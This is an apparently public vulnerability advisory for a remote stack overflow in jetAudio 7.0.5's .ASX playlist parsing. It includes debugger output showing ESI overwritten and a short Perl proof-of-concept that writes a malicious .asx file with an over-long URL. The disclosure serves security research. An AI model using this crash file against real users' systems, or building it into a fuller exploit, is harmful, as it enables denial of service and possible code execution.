jetaudioasx-overflow.txt

`Application: jetAudio 7.0.5 (.ASX) Remote Stack Overflow  
Web Site: http://www.cowonamerica.com/download/  
Platform: Windows  
Bug:Remote Stack Overflow  
Extension: ASX  
special condition: none  
  
-------------------------------------------------------  
  
1) Introduction  
  
2) Bug  
  
3) Proof of concept  
  
4) Credits  
  
===========  
1) Introduction  
===========  
  
A nice introduction to jetaudio can be found : http://www.cowonamerica.com/products/jetaudio/  
  
======  
2) Bug  
======  
  
When parsing an asx file with a long URL a stack overflow occurs.  
  
  
=====  
3)Proof of concept  
=====  
  
Proof of concept example :  
  
An url with 1096 A ( http://AAAAA....) will overwritte ESI and crash the program   
  
Here's the debugger output:  
Access violation - code c0000005  
  
eax=00000000 ebx=01187684 ecx=00000459 edx=0012d39c esi=41414141 edi=00000001  
  
eip=00441dad esp=0012cf3c ebp=00000001 iopl=0 nv up ei pl nz na po nc  
  
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010206  
  
JetAudio!CxImage::`copy constructor closure'+0x1109d:  
  
00441dad 8b06 mov eax,[esi] ds:0023:41414141=????????  
  
Here's the the Poc :  
  
  
#!/usr/local/bin/perl   
  
use strict;   
  
use warnings;   
  
my $file="myfile.asx";   
  
my $payload = "A" x 1096;   
  
open( $FILE, ">>$file") or die "Cannot open $file: $!";   
  
print $FILE "http://".$payload;   
  
close($FILE);   
  
print "$file has been created \n";   
  
  
  
  
  
=====  
5)Credits  
=====  
  
laurent gaffié  
laurent.gaffie{remove_this}[at]gmail[dot]com  
`